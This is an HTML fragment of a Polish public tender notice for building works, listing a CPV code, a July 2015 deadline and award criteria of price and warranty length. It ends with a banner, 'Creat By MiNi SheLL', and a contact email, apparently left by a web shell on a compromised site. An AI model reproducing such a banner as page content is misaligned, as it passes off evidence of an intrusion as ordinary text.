Szczegółowy zakres zadania został określony w  przedmiarze robót i specyfikacji technicznej wykonania i odbioru robót budowlanych ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.31.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.07.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. gwarancja na roboty i materiały 1 pkt. za 3 lata , 5 pkt. za 4 lata, 10 pkt za 5 lat - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com